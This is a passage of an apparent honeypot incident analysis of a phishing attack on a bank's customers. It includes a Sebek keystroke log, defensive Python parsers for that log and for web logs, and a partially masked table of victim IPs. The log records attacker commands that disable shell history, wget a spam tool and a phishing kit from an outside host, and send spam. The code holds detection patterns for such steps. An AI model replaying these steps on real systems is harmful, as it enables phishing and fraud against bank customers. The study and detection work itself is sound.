[2004-07-23 21:16:46 10.2.2.120 16986 bash 0]ls
[2004-07-23 21:16:52 10.2.2.120 16986 bash 0]tar xzvf bank1.tgz
[2004-07-23 21:16:54 10.2.2.120 16986 bash 0]ls
[2004-07-23 21:17:03 10.2.2.120 16986 bash 0]rm -rf bank1
[2004-07-23 21:17:04 10.2.2.120 16986 bash 0]ls
[2004-07-23 21:17:19 10.2.2.120 16986 bash 0]mv bank .internetBankingLogon
[2004-07-23 21:17:20 10.2.2.120 16986 bash 0]ls

23/07/04 - 21:17. The attacker edits the extracted web content and updates the HTML to point to a testing PHP script on a remote web server:

[2004-07-23 21:17:23 10.2.2.120 16986 bash 0]cd .internetBankingLogon
[2004-07-23 21:17:24 10.2.2.120 16986 bash 0]ls
[2004-07-23 21:17:29 10.2.2.120 16986 bash 0]pico
[2004-07-23 21:17:44 10.2.2.120 16986 bash 0]pico popup.htm
[2004-07-23 21:17:48 10.2.2.120 17058 pico 0][U-ARROW]l
[2004-07-23 21:18:41 10.2.2.120 16986 bash 0]pico popup.html
[2004-07-23 21:19:04 10.2.2.120 17060 pico 0][D-ARROW][D-ARROW][D-ARROW][D-ARROW][D-ARROW][D-ARROW][D-ARROW][D-ARROW]
                                                  [D-ARROW][D-ARROW][D-ARROW][D-ARROW][D-ARROW][D-ARROW][D-ARROW][D-ARROW]
                                                  [D-ARROW][D-ARROW][D-ARROW][D-ARROW][D-ARROW][D-ARROW][D-ARROW][D-ARROW]
                                                  [D-ARROW][D-ARROW][D-ARROW][D-ARROW][D-ARROW][D-ARROW][D-ARROW][D-ARROW]
                                                  [D-ARROW][D-ARROW][D-ARROW][D-ARROW][D-ARROW][D-ARROW][D-ARROW][D-ARROW]
                                                  [D-ARROW][D-ARROW][D-ARROW][D-ARROW][D-ARROW][D-ARROW][D-ARROW][D-ARROW]
                                                  [D-ARROW][D-ARROW][D-ARROW][D-ARROW][D-ARROW][D-ARROW][D-ARROW][D-ARROW]
                                                  [D-ARROW][D-ARROW][D-ARROW][D-ARROW][D-ARROW][D-ARROW][D-ARROW]php
[2004-07-23 21:19:17 10.2.2.120 16936 bash 0]telbnet
[2004-07-23 21:19:19 10.2.2.120 16936 bash 0]
[2004-07-23 21:22:19 10.2.2.120 17060 pico 0][L-ARROW][L-ARROW][L-ARROW][L-ARROW][L-ARROW][L-ARROW][L-ARROW][L-ARROW]
                                                  [R-ARROW][R-ARROW][R-ARROW][R-ARROW][R-ARROW][R-ARROW][R-ARROW][R-ARROW]
                                                  [R-ARROW][R-ARROW][R-ARROW][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS]
                                                  [BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS]
                                                  [BS][BS][BS][BS][BS][BS][BS][BS]http://69.24.XXX.XXX/testing.php[D-ARROW]
                                                  [L-ARROW][L-ARROW][U-ARROW][U-ARROW][D-ARROW][D-ARROW][U-ARROW][U-ARROW]
                                                  [D-ARROW][R-ARROW]y

23/07/04 - 21:22. The attacker checks the network configuration of the honeypot and version of PHP installed:

[2004-07-23 21:22:29 10.2.2.120 16986 bash 0]ls
[2004-07-23 21:22:31 10.2.2.120 16986 bash 0]pwd
[2004-07-23 21:25:06 10.2.2.120 16986 bash 0]/sbin/ifconfig
[2004-07-23 21:25:25 10.2.2.120 16936 bash 0]sense
[2004-07-23 21:48:36 10.2.2.120 16936 bash 0]php
[2004-07-23 21:48:42 10.2.2.120 16936 bash 0]/sbin/ifconfig
[2004-07-23 22:10:26 10.2.2.120 16936 bash 0]sense
[2004-07-23 22:28:32 10.2.2.120 16936 bash 0]ade[BS][BS][BS][BS][BS]qw
[2004-07-23 22:28:33 10.2.2.120 16936 bash 0]w

25/07/04 - 21:42. The attacker opens a second session, checks again that PHP is installed on the honeypot and downloads a tool for sending spam email from the same Romanian host:

[2004-07-25 21:42:25 xntps 0]SSH-1.5-PuTTY-Release-0.54
[2004-07-25 21:42:46 bash 0]unset HISTFILE
[2004-07-25 21:42:50 bash 0]cat /etc/hosts
[2004-07-25 22:07:28 bash 0]php
[2004-07-25 22:07:32 bash 0]cd /tmp
[2004-07-25 22:07:41 bash 0]wget host2.go.ro/sendbankNEW.tgz
[2004-07-25 22:07:50 bash 0]tar xzvf sendbankNEW.tgz ; rm -rf sendbankNEW.tgz

25/07/04 - 22:08. The attacker checks the input list of email addresses and runs a PHP script to send spam email:

[2004-07-25 22:08:00 bash 0]cd sendbank/
[2004-07-25 22:08:01 bash 0]ls
[2004-07-25 22:08:09 bash 0]cat list.
[2004-07-25 22:08:46 bash 0]ls
[2004-07-25 22:08:52 bash 0]php bank.php

25/07/04 - 22:10. The attacker edits the content of the spam message, pointing its link at a co-located Linux web server running an American student web site, and runs the PHP script to send spam email again:

[2004-07-25 22:10:22 bash 0]pico bla.txt
[2004-07-25 22:10:26 pico 0]php
[2004-07-25 22:13:33 pico 0][L-ARROW][L-ARROW][L-ARROW][L-ARROW][L-ARROW][L-ARROW][L-ARROW][L-ARROW]
                            [L-ARROW][L-ARROW][L-ARROW][L-ARROW][L-ARROW][L-ARROW][L-ARROW][L-ARROW]
                            [L-ARROW][L-ARROW][L-ARROW][L-ARROW][L-ARROW][L-ARROW][L-ARROW][L-ARROW]
                            [L-ARROW][L-ARROW][L-ARROW][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS]
                            [BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS]XXX.com/.y
[2004-07-25 22:13:36 bash 0]php bank.php
[2004-07-25 22:24:48 bash 0]cd ..
[2004-07-25 22:24:49 bash 0]ls
[2004-07-25 22:24:53 bash 0]rm -rf sendbank

The attacker's initial test at 22:08:52 works as planned, with 5 test messages being sent successfully (although, due to the outbound traffic restrictions on the Honeywall, further mass mailing attempts would have failed). However, after waiting about ten minutes the attacker cleans up and leaves without sending any further messages from this honeypot.
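Reading the Sebek output in the timeline above means mentally replaying the [BS] tokens and re-joining records that wrapped onto indented continuation lines (the "discovery" line that ends up as a plain w, or the mk that becomes mkdir .internetBankingLogon). As an added example, not code from the Honeynet Project, the following Python parses both header forms seen above, joins the continuations, replays the backspaces and tags the commands an analyst looks for first (history disabling, downloads, clean-up). LOG is a constructed excerpt of the keystrokes on this page; editor navigation tokens such as [D-ARROW] cannot be replayed without the file being edited, so they are kept in the output rather than guessed at.

```python
"""Reconstruct commands from Sebek keystroke logs.

Added example, not code from the Honeynet Project page. Sebek records
every keystroke, so an edited command line appears as typed text plus
[BS] tokens, and long records wrap onto indented continuation lines.
LOG is a constructed excerpt of the keystrokes shown in the timeline.
"""
import re

LOG = """\
[2004-07-23 21:11:58 xntps 0]SSH-1.5-PuTTY-Release-0.52
[2004-07-23 21:12:39 bash 0]discovery[BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS]
                            [BS][BS][BS][BS][BS][BS][BS][BS][BS][BS]w
[2004-07-23 21:12:44 bash 0]unset HISTFILE
[2004-07-23 21:13:52 10.2.2.120 16986 bash 0]mk[BS][BS][BS][BS][BS][BS][BS]mkdir .internetBankingLogon
[2004-07-23 21:13:59 10.2.2.120 16986 bash 0]cd [BS][BS][BS][BS][BS][BS]ls
[2004-07-23 21:14:43 10.2.2.120 16986 bash 0]wget host2.go.ro/bank/bank.zip
[2004-07-23 21:15:23 10.2.2.120 16986 bash 0]tar xzvf ba[BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS][BS]
                                                  unzip bank.zip
[2004-07-23 21:15:42 10.2.2.120 16986 bash 0]rm -rf bank.zip
"""

# Long form: [date time ip pid process uid]...; short form: [date time process uid]...
RECORD = re.compile(
    r'^\[(\d{4}-\d\d-\d\d \d\d:\d\d:\d\d)'
    r'(?: (\d+\.\d+\.\d+\.\d+) (\d+))? (\S+) (\d+)\](.*)$')
# A keystroke unit is either a bracketed token such as [BS] or a single character
TOKEN = re.compile(r'\[[A-Z-]+\]|.')

def apply_edits(raw):
    """Replay the keystrokes: [BS] removes the previous unit. Editor navigation
    tokens ([D-ARROW] etc.) cannot be replayed without the file, so they are
    kept as units; a backspace after one removes that token, as a terminal would
    remove whatever character sat before the cursor."""
    buf = []
    for tok in TOKEN.findall(raw):
        if tok == '[BS]':
            if buf:
                buf.pop()
        else:
            buf.append(tok)
    return ''.join(buf)

def parse_sebek(text):
    records = []
    for line in text.splitlines():
        m = RECORD.match(line)
        if m:
            ts, host, pid, proc, uid, keys = m.groups()
            records.append({'time': ts, 'host': host, 'pid': int(pid) if pid else None,
                            'process': proc, 'uid': int(uid), 'raw': keys})
        elif records and line[:1].isspace():
            records[-1]['raw'] += line.strip()   # wrapped continuation of the previous record
    for r in records:
        r['command'] = apply_edits(r['raw'])
    return records

FLAGS = [
    ('history-disabled', re.compile(r'\bunset\s+HIST|\bHISTFILE=|\bhistory\s+-c\b')),
    ('download', re.compile(r'\b(wget|curl|ftp|scp)\b')),
    ('cleanup', re.compile(r'\brm\s+-rf?\b')),
]

def flag_commands(records):
    """(time, label, reconstructed command) for every record matching a FLAGS pattern."""
    return [(r['time'], label, r['command'])
            for r in records for label, pat in FLAGS if pat.search(r['command'])]

if __name__ == '__main__':
    for r in parse_sebek(LOG):
        print(f"{r['time']} {r['process']:>5} {r['command']}")
    for t, label, cmd in flag_commands(parse_sebek(LOG)):
        print(f"{t} [{label}] {cmd}")
```

The reconstructed command column is what you would put in the incident timeline; the raw column stays available for the cases (pico sessions) where only the keystrokes, not the resulting file, are recoverable.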

Phishing Incident Victims

In this side note we provide an overview of the source IP addresses of potential victims in the UK phishing attack against a major US bank described in phishing technique one. The data below was collected with the help of the compromised UK honeypot and network packet captures. Over a period of about 4 days we observed 265 inbound HTTP requests to the honeypot, presumably from recipients of the spam phishing email who were tricked into clicking the link provided and fetching the redirected content. All were potential victims of the phishing attack, but none actually submitted personal data, so the phishing attack was unsuccessful.
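The distinction drawn above, between visitors who fetched the lure page and visitors who submitted data, comes from the web server log: a GET of the kit's index.htm is a potential victim, a POST to check.php is a credential submission. As an added example that is not part of the original analysis, the following Python makes that split from Apache combined-format log lines. The LOG lines are constructed (RFC 5737 documentation addresses, the .internetBankingLogon directory and check.php harvester from the timeline above) and deliberately include one submission so that both cases are visible; the real incident recorded none.

```python
"""Separate lure clicks from credential submissions in a phishing site's web log.

Added example, not from the Honeynet Project page. LOG is constructed in
Apache combined format using the kit's hidden directory and harvester as
seen in the timeline; the addresses are RFC 5737 documentation ranges.
"""
import re
from collections import Counter

LOG = """\
192.0.2.10 - - [27/Jul/2004:14:02:11 +0100] "GET /.internetBankingLogon/index.htm HTTP/1.1" 200 22085 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
192.0.2.10 - - [27/Jul/2004:14:02:12 +0100] "GET /.internetBankingLogon/BankInternetBankingfiles/logo.gif HTTP/1.1" 200 1489 "http://10.2.2.120/.internetBankingLogon/index.htm" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
192.0.2.10 - - [27/Jul/2004:14:03:30 +0100] "POST /.internetBankingLogon/check.php HTTP/1.1" 302 - "http://10.2.2.120/.internetBankingLogon/index.htm" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
198.51.100.7 - - [27/Jul/2004:14:05:40 +0100] "GET /.internetBankingLogon/index.htm HTTP/1.0" 200 22085 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
198.51.100.200 - - [27/Jul/2004:15:11:27 +0100] "GET /robots.txt HTTP/1.0" 404 276 "-" "Mozilla/5.0"
203.0.113.5 - - [28/Jul/2004:09:40:02 +0100] "GET /.internetBankingLogon/index.htm HTTP/1.1" 200 22085 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
"""

COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"')

KIT_DIR = '/.internetBankingLogon/'     # directory the attacker created in the web root
LURE = KIT_DIR + 'index.htm'            # the fake login page linked from the spam
HARVESTER = KIT_DIR + 'check.php'       # the script the login form posts to

def parse_log(text):
    """One dict per well-formed combined-format line; malformed lines are dropped."""
    return [m.groupdict() for m in map(COMBINED.match, text.splitlines()) if m]

def victim_report(entries):
    """Potential victims fetched the lure; actual victims posted to the harvester.
    Requests for the kit's images are ignored; anything outside the kit directory
    is background noise (crawlers, scanners) and counted separately."""
    clicks, submissions, other = set(), set(), Counter()
    lure_requests = 0
    for e in entries:
        if e['method'] == 'GET' and e['path'] == LURE:
            clicks.add(e['ip'])
            lure_requests += 1
        elif e['method'] == 'POST' and e['path'] == HARVESTER:
            submissions.add(e['ip'])
        elif not e['path'].startswith(KIT_DIR):
            other[e['ip']] += 1
    return {
        'lure_requests': lure_requests,
        'potential_victims': sorted(clicks),
        'submitted_credentials': sorted(submissions),
        'unrelated_hits': dict(other),
    }

if __name__ == '__main__':
    report = victim_report(parse_log(LOG))
    print(f"{report['lure_requests']} lure requests from "
          f"{len(report['potential_victims'])} hosts; "
          f"{len(report['submitted_credentials'])} submitted credentials")
```

Knowing which hosts posted to check.php is what decides whether the bank needs to be told to watch specific accounts, so the submission set, not the click count, is the number that matters in the notification.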

IP ISP Country OS
4.138.NNN.NNN Level 3 US Windows XP, 2000 SP2+ (NAT!)
4.224.NNN.NNN Level 3 US Windows 98
4.235.NNN.NNN Level 3 US Windows XP, 2000 SP2+ (NAT!)
4.239.NNN.NNN Level 3 US Windows XP, 2000 SP2+
12.202.NNN.NNN AT&T; US FreeBSD 4.7
12.217.NNN.NNN AT&T; US Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222)
12.218.NNN.NNN AT&T; US UNKNOWN
24.16.NNN.NNN Comcast Cable US Windows XP Pro SP1, 2000 SP3
24.58.NNN.NNN Road Runner US Windows XP Pro SP1, 2000 SP3
24.59.NNN.NNN Road Runner US Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222)
24.62.NNN.NNN Comcast Cable US Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222)
24.90.NNN.NNN Road Runner US Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222)
24.93.NNN.NNN Road Runner US Windows XP Pro SP1, 2000 SP3
24.107.NNN.NNN Charter Comms US Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222)
24.129.NNN.NNN Comcast Cable US Windows XP Pro SP1, 2000 SP3 (NAT!)
24.140.NNN.NNN Massillon Cable US Windows XP, 2000 SP2+
24.154.NNN.NNN Armstrong Cable US Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222)
24.160.NNN.NNN Road Runner US UNKNOWN
24.161.NNN.NNN Road Runner US Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222)
24.162.NNN.NNN Road Runner US Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222)
24.163.NNN.NNN Road Runner US Windows 2000 SP4, XP SP1
24.165.NNN.NNN Road Runner US Windows XP Pro SP1, 2000 SP3
24.166.NNN.NNN Road Runner US Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222)
24.208.NNN.NNN Road Runner US Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222)
24.209.NNN.NNN Road Runner US Windows XP Pro SP1, 2000 SP3 (firewall!)
24.220.NNN.NNN Midcontinent Comms US UNKNOWN
24.231.NNN.NNN Charter Comms US Windows XP SP1, 2000 SP3
24.239.NNN.NNN Armstrong Cable US Windows XP/2000
24.243.NNN.NNN Service Co LLC US Windows XP Pro SP1, 2000 SP3
63.165.NNN.NNN DIGITEL Prob US OpenBSD 3.0
63.192.NNN.NNN Pacific Bell US Windows 2000 SP4, XP SP1
64.12.NNN.NNN AOL US Linux 2.4 w/o timestamps
64.33.NNN.NNN West Winconsin Telecomn US Windows XP, 2000 SP2+
64.58.NNN.NNN Marlowe & Associates US Windows 98 (2) (NAT!)
64.136.NNN.NNN Juno Online US OpenBSD 3.0
64.136.NNN.NNN Juno Online US OpenBSD 3.0
64.136.NNN.NNN Juno Online US OpenBSD 3.0
64.161.NNN.NNN Pacific Bell Internet US Windows XP Pro SP1, 2000 SP3 (NAT!)
64.216.NNN.NNN SBC Internet US Windows XP Pro SP1, 2000 SP3 (NAT!)
64.222.NNN.NNN Verizon Internet US Windows 2000 SP4, XP SP 1
65.78.NNN.NNN RCN Corporation US FreeBSD 4.7
65.166.NNN.NNN Sprint US Windows 98
65.204.NNN.NNN Eagle Mountain Telecom US FreeBSD 4.8
65.221.NNN.NNN Buckeye Cablevision US Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222)
65.229.NNN.NNN UUNET US Windows XP/2000
66.38.NNN.NNN Brandenburg Telephone Company US Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222)
66.41.NNN.NNN Comcast Cable US Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222)
66.45.NNN.NNN WholeSecurity, Inc US Windows 2000 SP4, XP SP1
66.61.NNN.NNN Road Runner US Windows XP Pro SP1, 2000 SP3
66.67.NNN.NNN Road Runner US Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222)
66.68.NNN.NNN Road Runner US Windows XP Pro SP1, 2000 SP3
66.82.NNN.NNN Hughes Network Systems US UNKNOWN
66.170.NNN.NNN T-NET, Inc US Windows XP, 2000 SP2+
66.188.NNN.NNN Charter Comms US Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) (firewall!)
67.5.NNN.NNN Qwest US Windows XP, 2000 SP2+
67.23.NNN.NNN Adelphia Cable Comms US Windows XP Pro SP1, 2000 SP3
67.38.NNN.NNN Ameritech Electronic Commerce US Windows XP, 2000 SP2+
67.66.NNN.NNN SBC Internet Services US Windows XP SP1, 2000 SP3
67.122.NNN.NNN Pac Bell Internet US Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222)
67.160.NNN.NNN Comcast Cable US Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222)
67.164.NNN.NNN Comcast Cable US Windows XP Pro SP1, 2000 SP3 (NAT!)
67.167.NNN.NNN Comcast Cable US UNKNOWN
68.10.NNN.NNN Cox Communications Inc US Windows XP Pro SP1, 2000 SP3
68.14.NNN.NNN Cox Communications Inc US FreeBSD 4.7
68.32.NNN.NNN Comcast Cable US Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222)
68.53.NNN.NNN Comcast Cable US Windows XP Pro SP1, 2000 SP3
68.88.NNN.NNN SBC Internet Services US Windows 2000 SP4, XP SP1
68.89.NNN.NNN SBC Internet Services US Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222)
68.94.NNN.NNN SBC Internet Services US Windows XP Pro SP1, 2000 SP3 (NAT!)
68.103.NNN.NNN Cox Communications Inc US Windows XP Pro SP1, 2000 SP3
68.109.NNN.NNN Cox Communications Inc US Windows 2000 SP4, XP SP1
68.205.NNN.NNN Road Runner US UNKNOWN
68.254.NNN.NNN SBC Internet Services US Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222)
69.23.NNN.NNN - - Windows XP Pro SP1, 2000 SP3
69.48.NNN.NNN Choice One Comms US Windows XP, 2000 SP2+
69.59.NNN.NNN Peak Inc US Windows XP/2000 via Cisco
69.132.NNN.NNN Road Runner US Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222)
69.133.NNN.NNN Road Runner US Windows XP Pro SP1, 2000 SP3
69.134.NNN.NNN Road Runner US UNKNOWN
69.135.NNN.NNN Road Runner US Windows 2000 SP4, XP SP1
69.135.NNN.NNN Road Runner US Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222)
69.151.NNN.NNN SBC Internet Services US Windows XP Pro SP1, 2000 SP3 (NAT!)
69.162.NNN.NNN Adelphia Cable Comms US FreeBSD 4.7
137.229.NNN.NNN University of Alaska US Windows XP Pro SP1, 2000 SP3
141.154.NNN.NNN Verizon Internet US Windows XP SP1, 2000 SP3
148.78.NNN.NNN Starband Comms US CacheFlow CacheOS 4.1 (up
149.174.NNN.NNN CompuServe US Linux 2.4 w/o timestamps
152.163.NNN.NNN AOL US Linux 2.4 w/o timestamps
156.36.NNN.NNN US Bancorp US OpenBSD 3.0
162.83.NNN.NNN Verizon Internet US Windows 2000 SP4, XP SP1
166.102.NNN.NNN WRK Internet - Windows XP, 2000 SP2+
166.102.NNN.NNN WRK Internet - Windows XP, 2000 SP2+
169.207.NNN.NNN Executive PC, Inc US Windows 98
170.94.NNN.NNN State of Arkansas US Windows 2000 SP4, XP SP1
172.131.NNN.NNN AOL US Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222)
172.131.NNN.NNN AOL US Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222)
204.95.NNN.NNN Sprint US Windows XP, 2000 SP2+
204.210.NNN.NNN Road Runner US Windows 2000 SP4, XP SP1
204.210.NNN.NNN Road Runner US Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222)
205.162.NNN.NNN Buckeye Cablevision US Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222)
206.148.NNN.NNN AGIS US Windows XP, 2000 SP2+
206.196.NNN.NNN US West Internet Services US Windows XP Pro SP1, 2000 SP3
207.89.NNN.NNN NetLink Systems LLC US Windows XP, 2000 SP2+
207.89.NNN.NNN NetLink Systems LLC US Linux 2.4/2.6 (up
207.231.NNN.NNN Surewest Internet US BSD/OS 3.1
208.60.NNN.NNN Local Link US Windows XP, 2000 SP2+
208.187.NNN.NNN Lanset Comms US Windows XP, 2000 SP2+
208.191.NNN.NNN SBC Internet US Windows XP Pro SP1, 2000 SP3 (NAT!)
209.43.NNN.NNN IQuest Internet US Windows XP, 2000 SP2+
209.131.NNN.NNN CenturyTel Internet Holdings Inc US Windows 98
209.206.NNN.NNN IQuest Internet US Windows XP, 2000 SP2+
209.247.NNN.NNN Bend Cable US Linux 2.4/2.6 (up
216.93.NNN.NNN Voyager Information Networks US Windows XP, 2000 SP2+
216.228.NNN.NNN Bend Cable US Cisco Content Engine